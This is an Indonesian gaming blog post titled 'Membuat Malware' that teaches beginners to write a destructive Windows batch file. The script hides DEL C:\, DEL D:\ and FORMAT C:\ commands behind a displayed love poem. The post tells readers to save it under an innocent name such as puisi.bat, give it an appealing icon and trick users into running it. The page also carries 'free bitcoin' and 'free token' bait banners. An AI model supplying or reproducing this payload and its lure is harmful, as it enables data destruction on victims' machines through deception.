KeluarJangan Lupa Klik Like Dan Follow ya!
WELCOME TO andriworldwide.blogspot.com | Sesering mungkin mampir ke blog saya yang sederhana ini agar tidak ketinggalan berita-berita tentang game, terutama Ninja Saga dan yang lainnya | Jika ingin bertanya sesuatu tentang blog ini, kalian bisa bertanya | Jika ada kekurangan dalam blog ini mohon di maafkan | SALAM

GRATIS BITCOIN DI SINI

Get Free 100.000 SATOSHIS Get Free 1000 BITCOIN EARN 5500 BITCOIN

Membuat Malware

Share on :
Need ClAN NINJA SAGA ? -
Sekedar buat yang bener2 pemula yang pingin buat malware (virus).. 1. siapkan notepad
2. siapkan mental dan nyali karena ini akan menyangkut harkat dan martabat(^^??????)
3. copy ato tulis aja de di notepad ni script..
@echo off
echo. (-ini buat ganti baris)
echo Engkau adalah saat terindah dalam hidupku
echo Yang mencuri hatiku hingga sekarang aku tak punya hati lagi..(bla-bla-bla-lah buat dengan gayamu sendiri de tu puisi, ! inget tulisnya setelah echo ya..) DEL C:\ -y ( script buat del drive c)
DEL D:\ -y ( script buat del drive d)
FORMAT C:\ -y (script buat format c)
kalo uda simpan pake nama apapun yang penting menarik dengan format *.bat, (misalnya : puisi.bat). uda jadi tu “virus”..
cara kerjanya ialah kita mengundang si user buat ngeklik tu virus..bikin sesuai kreatifitasmu..misalnya seperti di bikin short cutnya dan di ganti iconnya dengan icon yang menarik ato gimana-gimana..
oke..cuma pingin bagi2 ilmu..biar gak ilang di telan pikiran sendiri 
Sumber : Pusat Hacking Se-Dunia

n258456064095_339.jpg (200×145)KLIK UNTUK DAPAT 100 TOKEN GRATIS.

0 comments on Membuat Malware :

Post a Comment

Jika Spam Akan DI hapus.

Tulisan Lain